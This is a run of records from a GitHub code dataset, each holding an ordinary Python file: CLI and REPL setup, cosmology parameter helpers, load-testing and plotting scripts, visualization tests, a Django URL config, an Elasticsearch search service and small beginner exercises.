quo.prompt import Prompt\nfrom quo.text import Text\n\nfrom mash.shell.shell import Shell, all_commands, run_command, main as shell_main\nfrom mash import io_util\nfrom mash.shell.base import ShellError\nfrom mash.doc_inference import infer_synopsis\n\nrprompt_init = 'Type any command to continue'\nrprompt_default = ''\nrprompt_error = 'Type `help` or ? for help'\n\n\ndef main(**shell_kwds):\n shell = shell_main(repl=False, **shell_kwds)\n session, shell = setup(shell)\n run(session, shell)\n\n\ndef setup(shell: Shell) -> Tuple[Prompt, Shell]:\n shell.ignore_invalid_syntax = False\n\n # setup a completion-dropdown\n completer = NestedCompleter.add({k: None for k in all_commands(shell)})\n\n # setup a history-completion\n for cmd in all_commands(shell):\n MemoryHistory.append(cmd)\n\n session = Prompt(\n history=MemoryHistory,\n suggest=\"history\",\n rprompt=Text(rprompt_init),\n enable_history_search=True,\n completer=completer,\n vi_mode=True,\n bottom_toolbar=lambda: toolbar(shell)\n )\n return session, shell\n\n\ndef run(session: Prompt, shell: Shell):\n io_util.interactive = True\n print('Press ctrl-d to exit, ctrl-c to cancel, TAB for word completion, ? for help and ! for shell interop.')\n while True:\n step(session, shell)\n\n\ndef step(session, shell):\n try:\n cmd = session.prompt(shell.prompt)\n try:\n run_command(cmd, shell)\n session.rprompt = Text(rprompt_default)\n except ShellError as e:\n print(e)\n session.rprompt = Text(rprompt_error)\n except KeyboardInterrupt:\n pass\n except EOFError:\n sys.exit(1)\n\n\ndef toolbar(shell: Shell, text='Run any command to show info'):\n method = shell.last_method()\n if method:\n text = generate_help(method)\n\n return Text(text)\n\n\ndef generate_help(func):\n synopsis = infer_synopsis(func)\n full_text = synopsis\n if func.__doc__:\n full_text += f' | {func.__doc__}'\n\n # keep the first few lines\n return '\\n'.join(full_text.split('\\n')[:3])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"voschezang/mash","sub_path":"src/mash/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73090875769","text":"# Duta Kukuh Pribadi\r\n\r\nangka = None\r\n\r\nbilTotal = 0\r\n\r\nwhile angka != 0:\r\n try:\r\n angka = input(\"Enter a number : \")\r\n angka = int(angka)\r\n\r\n except :\r\n print(\"Error:\\'\", angka , \"\\'is not a valid number. Please try again.\")\r\n\r\n else : \r\n if angka % 2 == 0:\r\n bilTotal += angka*angka\r\n\r\nprint(\"The sum of the squares of the even numbers is:\" , bilTotal)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"olober76/Python-Learning","sub_path":"Tugas/tugas1.py","file_name":"tugas1.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29418277808","text":"# JT 2017-19\n\nfrom __future__ import division\nfrom importlib import import_module\nfrom six import string_types\nfrom copy import deepcopy\nfrom collections import OrderedDict as odict\nimport numpy as np\n\n# Conventions\n_label = \"label\"\n_prior = \"prior\"\n_theory = \"theory\"\n_params = \"params\"\n_likelihood = \"likelihood\"\n_sampler = \"sampler\"\n_p_label = \"latex\"\n_p_dist = \"dist\"\n_p_value = \"value\"\n_p_derived = \"derived\"\n_p_renames = \"renames\"\n_separator = \"__\"\n_separator_files = \".\"\n_minuslogprior = \"minuslogprior\"\n_prior_1d_name = \"0\"\n_chi2 = \"chi2\"\n_weight = \"weight\"\n_minuslogpost = \"minuslogpost\"\n_post = \"post\"\n\n\ndef get_info_params(info):\n \"\"\"\n Extracts parameter info from the new yaml format.\n \"\"\"\n # Prune fixed parameters\n info_params = info.get(_params)\n info_params_full = odict()\n for p, pinfo in info_params.items():\n # Discard fixed+non-saved parameters\n if is_fixed_param(pinfo) and not is_derived_param(pinfo):\n continue\n info_params_full[p] = info_params[p]\n # Add prior and likelihoods\n priors = [_prior_1d_name] + list(info.get(_prior, []))\n likes = list(info.get(_likelihood))\n # Account for post\n remove = info.get(_post, {}).get(\"remove\", {})\n for param in remove.get(_params, []) or []:\n info_params_full.pop(param, None)\n for like in remove.get(_likelihood, []) or []:\n likes.remove(like)\n for prior in remove.get(_prior, []) or []:\n priors.remove(prior)\n add = info.get(_post, {}).get(\"add\", {})\n # Adding derived params and updating 1d priors\n for param, pinfo in add.get(_params, {}).items():\n pinfo_old = info_params_full.get(param, {})\n pinfo_old.update(pinfo)\n info_params_full[param] = pinfo_old\n likes += list(add.get(_likelihood, []))\n priors += list(add.get(_prior, []))\n # Add the prior and the likelihood as derived parameters\n info_params_full[_minuslogprior] = {_p_label: r\"-\\log\\pi\"}\n for prior in priors:\n info_params_full[_minuslogprior + _separator + prior] = {\n _p_label: r\"-\\log\\pi_\\mathrm{\" + prior.replace(\"_\", r\"\\ \") + r\"}\"}\n info_params_full[_chi2] = {_p_label: r\"\\chi^2\"}\n for like in likes:\n info_params_full[_chi2 + _separator + like] = {\n _p_label: r\"\\chi^2_\\mathrm{\" + like.replace(\"_\", r\"\\ \") + r\"}\"}\n return info_params_full\n\n\ndef get_range(param_info):\n # Sampled\n if is_sampled_param(param_info):\n info_lims = dict([[l, param_info[_prior].get(l)] for l in [\"min\", \"max\", \"loc\", \"scale\"]])\n if info_lims[\"min\"] is not None or info_lims[\"max\"] is not None:\n lims = [param_info[_prior].get(\"min\"), param_info[_prior].get(\"max\")]\n elif info_lims[\"loc\"] is not None or info_lims[\"scale\"] is not None:\n dist = param_info[_prior].pop(_p_dist, \"uniform\")\n pdf_dist = getattr(import_module(\"scipy.stats\", dist), dist)\n lims = pdf_dist.interval(1, **param_info[_prior])\n # Derived\n elif is_derived_param(param_info):\n lims = (lambda i: [i.get(\"min\", -np.inf), i.get(\"max\", np.inf)])(param_info or {})\n # Fixed\n else:\n lims = None\n return lims\n\n\ndef is_fixed_param(info_param):\n \"\"\"\n Returns True if the parameter has been fixed to a value or through a function.\n \"\"\"\n return expand_info_param(info_param).get(_p_value, None) is not None\n\n\ndef is_sampled_param(info_param):\n \"\"\"\n Returns True if the parameter has a prior.\n \"\"\"\n return _prior in expand_info_param(info_param)\n\n\ndef is_derived_param(info_param):\n \"\"\"\n Returns True if the parameter is saved as a derived one.\n \"\"\"\n return expand_info_param(info_param).get(_p_derived, False)\n\n\ndef expand_info_param(info_param):\n \"\"\"\n Expands the info of a parameter, from the user friendly, shorter format\n to a more unambiguous one.\n \"\"\"\n info_param = deepcopy(info_param)\n if not hasattr(info_param, \"keys\"):\n if info_param is None:\n info_param = odict()\n else:\n info_param = odict([[_p_value, info_param]])\n if all([(f not in info_param) for f in [_prior, _p_value, _p_derived]]):\n info_param[_p_derived] = True\n # Dynamical input parameters: save as derived by default\n value = info_param.get(_p_value, None)\n if isinstance(value, string_types) or callable(value):\n info_param[_p_derived] = info_param.get(_p_derived, True)\n return info_param\n\n\ndef get_sampler_type(filename_or_info):\n if isinstance(filename_or_info, string_types):\n from getdist.yaml_tools import yaml_load_file\n filename_or_info = yaml_load_file(filename_or_info)\n default_sampler_for_chain_type = \"mcmc\"\n sampler = list(filename_or_info.get(_sampler, [default_sampler_for_chain_type]))[0]\n return {\"mcmc\": \"mcmc\", \"polychord\": \"nested\", \"minimize\": \"minimize\"}[sampler]\n\n\ndef get_sample_label(filename_or_info):\n if isinstance(filename_or_info, string_types):\n from getdist.yaml_tools import yaml_load_file\n filename_or_info = yaml_load_file(filename_or_info)\n return filename_or_info.get(_label, None)\n","repo_name":"mishakb/ISiTGR","sub_path":"python/getdist/cobaya_interface.py","file_name":"cobaya_interface.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"1993983362","text":"# Desenvolva um programa em Python que simule um sistema de chamada de clientes.\n# Esse sistema deve permitir dois tipos de operação ao usuário:\n# a entrada de um novo cliente e a exibição do cliente a ser atendido.\n# Essas operações podem ser visualizadas como a inserção de um novo elemento em uma fila e a remoção de um elemento de uma fila.\n\natendimento = []\nwhile True:\n escolha = input(str(\"Digite o N para incluir um cliente, S para sair ou P para realizar o atendimento: \"))\n\n if escolha == \"N\":\n cliente = input(str(\"Digite o nome do cliente: \"))\n atendimento.append(str(cliente))\n\n elif escolha == \"P\":\n print(atendimento.pop(0))\n\n elif escolha == \"S\":\n list(atendimento)\n break\n\n\n # TESTANDO:","repo_name":"Lilarickli/projetos_e","sub_path":"MetOrdEstDados/Implementacao_Fila.py","file_name":"Implementacao_Fila.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11155308224","text":"#!/usr/bin/env python3\n\nimport sys, os\nfrom time_threads import time_threads\nimport test_setup\nimport time\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport uuid\nimport configparser\nimport datetime\nimport subprocess\nfrom subprocess import Popen, PIPE\n\n\n# Creates test directories if they don't already exist \ntest_setup.check()\ntest_setup.clean()\n\n# Get config values\nconfig = configparser.ConfigParser()\nconfig.read('config.cfg')\n\nCAPTURE = config.get('ConfigInfo', 'CAPTURE')\n\n\nclass test_time:\n \"\"\"\n Run pman/pfioh at x requests per second for a given length of time\n \"\"\"\n \n num_threads = []\n success_rate = []\n avg_duration = []\n avg_cpu_util = []\n avg_mem_util = []\n nums = []\n START = 0\n \n # Process name, command, initial number of threads, final number of threads (to scale up to), duration of test\n def __init__(self, pname, cmd, nt, time):\n \"\"\"\n \"\"\"\n \n self.pname = pname # needs to be passed to time_threads for the sake of getting back success status because returned pman & pfioh json responses are slightly different \n self.cmd = cmd\n self.num_threads = nt\n self.time = time * 60 # convert minutes --> seconds\n \n def run(self):\n \"\"\"\n \"\"\"\n \n global num_threads\n global success_rate\n global avg_duration\n global avg_cpu_util\n global avg_mem_util\n global nums\n global START\n \n num_threads = []\n success_rate = []\n avg_duration = []\n avg_cpu_util = []\n avg_mem_util = []\n nums = []\n threads = []\n START = 0\n \n start_time = time.time()\n count = 0\n index = 1\n\n print(\"number of threads is: %s\" % self.num_threads)\n\n if CAPTURE:\n \n # Clear log \n subprocess.call('> /tmp/top.log', shell=True)\n\n # Start logging CPU and memory utilization \n log_cmd = \"pgrep %s\" % self.pname\n process = Popen(log_cmd, stdout=PIPE, stderr=PIPE, shell=True)\n stdout, stderr = process.communicate()\n PID = int(stdout)\n subprocess.call([\"top -p \" + str(PID) + \" -d 0.2 -b | grep --line-buffered \" + self.pname + \" | awk '{print $9, $10; fflush();}' >> /tmp/top.log &\"], shell=True)\n \n # Every second, capture & log information (success rate, average duration, etc.)\n while((time.time() - start_time) < float(self.time)):\n \n duration = 0\n successes = 0\n\n # Measure duration and success of each thread\n for t in threads:\n duration += t.get_duration()\n if t.get_success():\n successes += 1\n\n # Scale up to num_threads\n if len(threads) < self.num_threads:\n\n #######\n temp_cmd = self.cmd.split(\" \")\n temp_cmd[2] += str(index * 100000)\n curr_cmd = \" \".join(temp_cmd)\n index += 1\n #######\n\n curr = time_threads(self.pname, curr_cmd)\n threads.append(curr)\n curr.start()\n\n nums.append(count)\n num_threads.append(len(threads))\n curr_time = time.time()\n\n \n # Calculate duration and success rate\n duration = duration/float(len(threads))\n\n if (duration > 0) and (START == 0):\n START = len(nums)\n \n try:\n successes = (successes/float(len(threads))) * 100\n except: \n successes = 0\n \n # Log calculations\n avg_duration.append(duration)\n success_rate.append(successes)\n\n ############### Print Results ###############\n \n print(\"Duration is: %s\\n\" % str(duration))\n print(\"Success rate is: %d\\n\" % successes)\n\n # Calculate & sleep for the remainder of the second so that the while loop executes once a second\n count += 1\n diff = (curr_time + 1) - time.time()\n time.sleep(diff)\n \n for a in threads:\n a.stop()\n\n for t in threads:\n t.join()\n\n def graph(self):\n \"\"\"\n \"\"\"\n\n global START\n \n dt = datetime.datetime.now()\n r_name = \"test_%s_time_%s_%s.txt\" % (self.pname, str(dt.date()), str(dt.time()))\n results = open(r_name, \"x\")\n \n cpu = []\n mem = 0\n cpu_util = 0\n mem_util = 0\n\n if CAPTURE:\n \n subprocess.call(\"kill -9 $(pgrep top)\", shell=True)\n \n top_count = 0\n \n f = open(\"/tmp/top.log\", \"r\")\n for line in f:\n try:\n curr = line.split()\n cpu.append(float(curr[0]))\n mem += float(curr[1])\n top_count += 1\n except:\n continue\n \n f.close()\n \n try:\n cpu_util = max(cpu)\n mem_util = mem/top_count\n avg_cpu_util.append(cpu_util)\n avg_mem_util.append(mem_util)\n \n print(\"CPU is: %s\\n\" % cpu_util)\n print(\"Mem is: %s\\n\" % mem_util)\n \n except:\n pass\n\n dur_sum = 0\n success_sum = 0\n for x in range(START, len(nums)):\n dur_sum += avg_duration[x]\n success_sum += success_rate[x]\n\n dur_sum = dur_sum / len(nums)\n success_sum = success_sum / (len(nums) - START)\n\n print(\"Average duration is: %f\\n\" % dur_sum)\n print(\"Average success rate is: %f\\n\" % success_sum)\n\n results.write(\"CPU utilization is: %s\\n\" % cpu_util)\n results.write(\"Memory utilization is: %s\\n\" % mem_util)\n results.write(\"Average success rate is: %f\\n\" % success_sum)\n results.write(\"Average duration is: %f\\n\" % dur_sum)\n\n results.close()\n \n fig, axes = plt.subplots(nrows=2, ncols=2)\n ax0, ax1, ax2, ax3 = axes.flatten()\n\n #ax0.plot(self.nums, self.cpu)\n #ax1.plot(nums, num_threads)\n ax2.plot(nums, avg_duration)\n ax3.plot(nums, success_rate)\n #ax3.plot(self.nums, self.thr)\n #ax0.set_title('CPU Utilization')\n\n #ax1.set_title('Number of Threads')\n ax2.set_title('Average Duration')\n ax3.set_title('Success Rate')\n\n #ax0.axis([0, self.time, 0, 400]) \n #ax1.axis([0, self.time, 0, 50])\n ax2.axis([0, self.time, 0, 20])\n ax3.axis([0, self.time, 0, 150])\n\n plt.suptitle(\"\" + self.pname + \" | \" + str(self.num_threads) + \" requests/second\" + \" | \" + str(self.time / 60) + \" minutes\")\n\n plt.show()\n\n","repo_name":"FNNDSC/ChRIS-E2E","sub_path":"scale-testing/test_time.py","file_name":"test_time.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39936874518","text":"import csv\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport matplotlib.pyplot as plt\nimport re\nfrom random import randint\n\n\ndef create_plot(name, parameters, window):\n\n fig = plt.figure(figsize=(5, 4), dpi=100)\n plot = fig.add_subplot()\n\n with open(f'results/data_to_plot_{name}.csv', newline='') as csvfile:\n\n data = csv.DictReader(csvfile, delimiter=';')\n values = []\n for row in data:\n float_value = float(row['best_makespan'])\n values.append(float_value)\n\n box_plot_data = values\n plot.boxplot(box_plot_data)\n\n plt.title(parameters, fontsize=10)\n\n # Create a canvas widget from the figure\n canvas = FigureCanvasTkAgg(fig, master=window)\n canvas.draw()\n canvas.get_tk_widget().pack(fill=\"both\", expand=True)\n\n\ndef generate_colors(size):\n colors = []\n for i in range(size):\n colors.append('#%06X' % randint(0, 0xFFFFFF))\n return colors\n\ndef get_max_task_id(tab2d):\n max_id = 0\n for row in tab2d:\n for task_id in row:\n if task_id > max_id:\n max_id = task_id\n return max_id\n\ndef parse_output(name):\n tasks_ret = []\n times_ret = []\n with open(f'results/output_{name}.csv', newline='') as csvfile:\n row_lp = 0\n for row in csvfile:\n row_lp = row_lp + 1\n if row_lp <= 2:\n continue\n\n times_tmp = []\n tasks_tmp = []\n row_splited = row.split(';')\n\n for t in row_splited:\n pair = re.findall(r\"\\d+\\.*\\d*\", t)\n if len(pair) <= 1:\n continue\n tasks_tmp.append(int(pair[0]))\n times_tmp.append(float(pair[1]))\n tasks_ret.append(tasks_tmp)\n times_ret.append(times_tmp)\n return tasks_ret, times_ret\n\ndef sum_columns_on_left(tab):\n ret = []\n for row in tab:\n sum_on_left = 0\n new_row = []\n for col in range(len(row)):\n new_row.append(sum_on_left + row[col])\n sum_on_left = sum_on_left + row[col]\n ret.append(new_row)\n return ret\n\ndef max_sum_in_row(tab2d):\n max_val = 0\n for row in tab2d:\n sum_row = 0\n for col in row:\n sum_row = sum_row + col\n if sum_row > max_val:\n max_val = sum_row\n return max_val\n\ndef draw_schedule(name):\n tasks, times = parse_output(name)\n times_cum = sum_columns_on_left(times)\n max_task_id = get_max_task_id(tasks)\n colors = generate_colors(max_task_id + 1)\n\n fig, ax = plt.subplots(figsize=(14, 8), label='Schedule')\n fig.subplots_adjust(left=.05, right=.99, bottom=0.05, top=1)\n ax.invert_yaxis()\n ax.xaxis.set_visible(True)\n ax.set_xlim(0, max_sum_in_row(times))\n\n for row in range(len(times)):\n for j in range(len(times[row])):\n starts = times_cum[row][j] - times[row][j]\n ax.barh('M' + str(row), times[row][j], left=starts, height=0.8, color=colors[tasks[row][j]])\n x_pos = times_cum[row][j] - (times[row][j] / 2)\n ax.text(x_pos, row, tasks[row][j], ha=\"center\", va=\"center\", color=\"black\", size=9 )\n\n fig.show()\n","repo_name":"instant-results/scheduling-parallel-batch-jobs","sub_path":"plot_creating.py","file_name":"plot_creating.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7752307508","text":"import itertools\nfrom typing import Iterable\n\nimport altair as alt\nimport pandas as pd\nimport pytest\n\nfrom draco.debug import (\n ChartConfig,\n DracoDebug,\n DracoDebugChartConfig,\n DracoDebugPlotter,\n)\n\nspecs: dict[str, Iterable[str] | str] = {\n \"tick_plot\": \"\"\"\n attribute(number_rows,root,100).\n entity(field,root,temperature).\n attribute((field,name),temperature,temperature).\n attribute((field,type),temperature,number).\n entity(view,root,0).\n entity(mark,0,1).\n attribute((mark,type),1,tick).\n entity(encoding,1,2).\n attribute((encoding,channel),2,x).\n attribute((encoding,field),2,temperature).\n entity(scale,0,3).\n attribute((scale,channel),3,x).\n attribute((scale,type),3,linear).\n\"\"\",\n \"tick_plot_log\": \"\"\"\n attribute(number_rows,root,100).\n entity(field,root,temperature).\n attribute((field,name),temperature,temperature).\n attribute((field,type),temperature,number).\n entity(view,root,0).\n entity(mark,0,1).\n attribute((mark,type),1,tick).\n entity(encoding,1,2).\n attribute((encoding,channel),2,x).\n attribute((encoding,field),2,temperature).\n entity(scale,0,3).\n attribute((scale,channel),3,x).\n attribute((scale,type),3,log).\n\"\"\",\n}\n\n\ndef test_init():\n # init should work without raising exceptions\n instance = DracoDebug(specs=specs)\n assert type(instance) is DracoDebug\n\n\ndef test_chart_preferences():\n instance = DracoDebug(specs=specs)\n df = instance.chart_preferences\n rows, cols = df.shape\n assert cols == len(\n [\"chart_name\", \"pref_name\", \"pref_description\", \"count\", \"weight\"]\n )\n assert rows == len(instance.specs) * len(instance.feature_names)\n\n\ndef __create_test_data(num_data_rows: int = 10) -> pd.DataFrame:\n return pd.DataFrame(\n data=[(\"x\", \"y\", i, i % 4) for i in range(1, num_data_rows + 1)],\n columns=[\"chart_name\", \"pref_name\", \"count\", \"weight\"],\n )\n\n\n@pytest.mark.parametrize(\n \"config\",\n list(DracoDebugChartConfig),\n)\ndef test_draco_debug_chart_config_by_title(config: DracoDebugChartConfig):\n assert DracoDebugChartConfig.by_title(config.value.title) == config\n\n\n@pytest.mark.parametrize(\n \"title\",\n [\"\", \"foo\", \"bar\"],\n)\ndef test_draco_debug_chart_config_by_title_raises_for_unknown_title(title: str):\n with pytest.raises(ValueError):\n DracoDebugChartConfig.by_title(title)\n\n\n@pytest.mark.parametrize(\n \"data\",\n [__create_test_data(0), __create_test_data(5)],\n)\ndef test_plotter_init(data):\n instance = DracoDebugPlotter(chart_preferences=data)\n assert type(instance) is DracoDebugPlotter\n\n\ndef __create_test_debug_plotter(num_data_rows: int = 10) -> DracoDebugPlotter:\n data = __create_test_data(num_data_rows)\n return DracoDebugPlotter(chart_preferences=data)\n\n\n# Running `test_plotter_create_chart` param combinations\n# using data frames with this many rows against each config\n__num_data_row_test_cases = [0, 100, 1000, 10_000]\n\n# Running `test_plotter_create_chart` with these configs\n__chart_config_test_cases = [\n None,\n *list(DracoDebugChartConfig),\n ChartConfig(title=\"Test Title\", sort_x=None, sort_y=None),\n]\n# Produces the `\"instance,config\"` tuples for `@pytest.mark.parametrize`\n__create_chart_test_cases = list(\n itertools.product(\n map(__create_test_debug_plotter, __num_data_row_test_cases),\n __chart_config_test_cases,\n )\n)\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = instance.create_chart(cfg=config, violated_prefs_only=False)\n chart_violated_prefs_only = instance.create_chart(\n cfg=config, violated_prefs_only=True\n )\n charts = [chart, chart_violated_prefs_only]\n\n # Expect a vertically concatenated chart made up of two sub-plots in each case\n assert all(type(c) is alt.VConcatChart and len(c.vconcat) == 2 for c in charts)\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart_used_data(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = instance.create_chart(cfg=config)\n\n # The passed data should be used for visualization\n assert pd.DataFrame.eq(chart.data, instance.chart_preferences).all().all()\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart_title(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = instance.create_chart(cfg=config)\n\n # Expect that the configured title is used\n if config is not None:\n config = config if isinstance(config, ChartConfig) else config.value\n assert chart.title == config.title\n\n\ndef __mark_as_str(mark: str | alt.MarkDef) -> str:\n if isinstance(mark, str):\n return mark\n else:\n mark_def: alt.MarkDef = mark\n return mark_def.type\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart_subplot_marks(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = instance.create_chart(cfg=config)\n weight_bar_chart, pref_rect_chart = chart.vconcat\n\n # Expect the weight chart to use `bar` as its mark\n assert __mark_as_str(weight_bar_chart.mark) == \"bar\"\n # Expect the pref grid chart to use `rect` as its mark\n assert __mark_as_str(pref_rect_chart.mark) == \"rect\"\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart_subplot_sorting(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = instance.create_chart(cfg=config)\n weight_bar_chart, pref_rect_chart = chart.vconcat\n\n # Expect that custom-configured sorting is used\n if config is not None:\n config = config if isinstance(config, ChartConfig) else config.value\n if config.sort_x is not None:\n assert (\n weight_bar_chart.encoding.x.__dict__[\"_kwds\"][\"sort\"] == config.sort_x\n )\n assert pref_rect_chart.encoding.x.__dict__[\"_kwds\"][\"sort\"] == config.sort_x\n if config.sort_y is not None:\n assert pref_rect_chart.encoding.y.__dict__[\"_kwds\"][\"sort\"] == config.sort_y\n","repo_name":"cmudig/draco2","sub_path":"draco/tests/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"76"} +{"seq_id":"74179076084","text":"class User:\n def __init__(self, requests):\n self.requests = requests\n\n async def get_user_by_id(self, tid: str) -> dict:\n r = await self.requests.get(f'https://teverse.com/api/users/{tid}')\n return await r.json()\n\n async def get_user_games(self, tid: str) -> list:\n r = await self.requests.get(f'https://teverse.com/api/users/{tid}/games')\n return await r.json()\n","repo_name":"iranathan/teverse.py","sub_path":"teverse/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26561018845","text":"from django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom .views import delete_client, index, client, client_new, info, transaction, vendor, vendordetail, vendortransaction, reminder, expense, invoice, search, paid_by_client, delete_client\nurlpatterns = [\n path('', auth_views.LoginView.as_view(), name='login'),\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n path('index/', index, name=\"home\"),\n path('client/', client, name=\"client\"),\n path('add/', client_new, name=\"add\"),\n path('info//', info, name=\"info\"),\n path('transaction/', transaction, name=\"transaction\"),\n path('vendor/', vendor, name=\"vendor\"),\n path('vendor-detail//', vendordetail, name=\"vendor-detail\"),\n path('vendor-transaction/', vendortransaction, name=\"vendor-transaction\"),\n path('reminder/', reminder, name=\"reminder\"),\n path('expense/', expense, name=\"expense\"),\n path('invoice/', invoice, name=\"invoice\"),\n path('search/', search, name=\"search\"),\n path('paid_by_client/', paid_by_client, name=\"paid_by_client\"),\n path('delete//', delete_client, name=\"delete\"),\n\n]","repo_name":"abi2772/aqua","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5210903114","text":"from pickle import loads, dumps\nfrom typing import Optional\n\nfrom aioredis import Redis\nfrom elasticsearch import AsyncElasticsearch\nfrom elasticsearch.exceptions import NotFoundError as ES_NotFoundError\nfrom elasticsearch_dsl import Search, Q\n\nfrom models.base import BaseModel\n\nCACHE_EXPIRE_IN_SECONDS = 60 * 5 # 5 минут\n\n\nclass BaseService:\n\n def __init__(self, redis: Redis, elastic: AsyncElasticsearch, index: str):\n self.redis = redis\n self.elastic = elastic\n self.index = index\n self.search_fields = []\n self.model = BaseModel\n\n async def get_by_id(self, instance_id: str):\n \"\"\"Получаем объект по id\"\"\"\n\n instance = await self._get_from_cache(instance_id)\n if not instance:\n instance = await self._get_from_elastic(instance_id)\n if not instance:\n return None\n await self._put_to_cache(instance.uuid, instance)\n return instance\n\n async def get_list(self, **params):\n \"\"\"Получаем список объектов\"\"\"\n\n redis_key = ':'.join([str(value) for value in params.values()])\n docs = await self._get_from_cache(redis_key)\n if not docs:\n body = self.get_body_query(**params)\n docs = await self.elastic.search(index=self.index, body=body)\n if not docs:\n return []\n await self._put_to_cache(redis_key, docs)\n return [self.model(**dict(doc['_source'])) for doc in docs['hits']['hits']]\n\n async def _get_from_elastic(self, instance_id: str) -> Optional[BaseModel]:\n try:\n doc = await self.elastic.get(self.index, instance_id)\n return self.model(**doc['_source'])\n except ES_NotFoundError:\n return\n\n async def _put_to_cache(self, key, value):\n await self.redis.set(self.form_redis_key(key), dumps(value), expire=CACHE_EXPIRE_IN_SECONDS)\n\n async def _get_from_cache(self, key):\n data = await self.redis.get(self.form_redis_key(key))\n if data:\n return loads(data)\n\n def form_redis_key(self, key):\n \"\"\"Формируем ключ для redis\"\"\"\n return f'{self.index}:{str(key)}'\n\n def get_body_query(self, **params) -> dict:\n \"\"\"Формируем тело запроса в elastic\"\"\"\n\n _sort = params.get('sort')\n page_number = params.get('page_number')\n page_size = params.get('page_size')\n filter_genre = params.get('filter_genre')\n query = params.get('query')\n person_id = params.get('person_id')\n\n body_query = Search(using=self.elastic, index=self.index)\n start = (page_number - 1) * page_size\n if start >= 1000:\n start = 1000 - page_size\n body_query = body_query[start: start + page_size]\n\n if _sort:\n body_query = body_query.sort(_sort)\n if query:\n body_query = body_query.query(\"multi_match\", query=query, fields=self.search_fields)\n if filter_genre:\n body_query = body_query.query('nested', path='genre', query=Q(\"match\", genre__uuid=filter_genre))\n if person_id:\n body_query = body_query.query(Q('nested', path='actors', query=Q(\"match\", actors__uuid=person_id)) |\n Q('nested', path='directors', query=Q(\"match\", directors__uuid=person_id)) |\n Q('nested', path='writers', query=Q(\"match\", writers__uuid=person_id)))\n return body_query.to_dict()\n","repo_name":"maxsnegir/AsyncCinema","sub_path":"src/services/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"19110778847","text":"#!/usr/bin/env python3\n\n\ndef main():\n N, L = map(int, input().split())\n x = set(map(int, input().split()))\n T = list(map(int, input().split()))\n # dp[i]: 距離iに到達する最短時間\n INF = 10**18\n dp = [INF] * (L+4)\n dp[0] = 0\n for i in range(L):\n tmp = dp[i]\n if i in x: # ハードルあり\n tmp += T[2]\n # 行動1の場合\n dp[i+1] = min(dp[i+1], tmp + T[0])\n # 行動2の場合\n if i+1 == L:\n dp[i+1] = min(dp[i+1], tmp + T[0]//2 + T[1]//2)\n dp[i+2] = min(dp[i+2], tmp + T[0] + T[1])\n # 行動3の場合\n if i+2 == L:\n dp[i+2] = min(dp[i+2], tmp + T[0]//2 + (T[1]*3)//2)\n elif i+3 == L:\n dp[i+3] = min(dp[i+3], tmp + T[0]//2 + (T[1]*5)//2)\n dp[i+4] = min(dp[i+4], tmp + T[0] + T[1]*3)\n print(dp[L])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ryu19-1/atcoder_python","sub_path":"past202005/h/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26197855543","text":"from sys import argv as ag\n\ndef addToNumbers (number1, number2):\n print('StartProgram: addTonymbers executed...\\n')\n result = number1+number2\n\n return result\nanswer = False\ndef isEven (aNumber):\n if (aNumber%2==0 ):\n return True\n #print (\"It's even\")\n else: \n return False\n #print (\"It's odd\")\n\nif __name__ == \"__main__\":\n # print ( f' Sum is equal to = {adToNumbers (int(ag[1])),int(ag[2]))}')\n n1 = int (input ('Join first number:\\t'))\n n2 = int (input ('Join second number:\\t'))\n\n # print (f'Sum is equal to = {addToNumbers (n1,n2) }')\n # answer = isEven ( addToNumbers (n1,n2))\n\n #isPrime (n1)\n 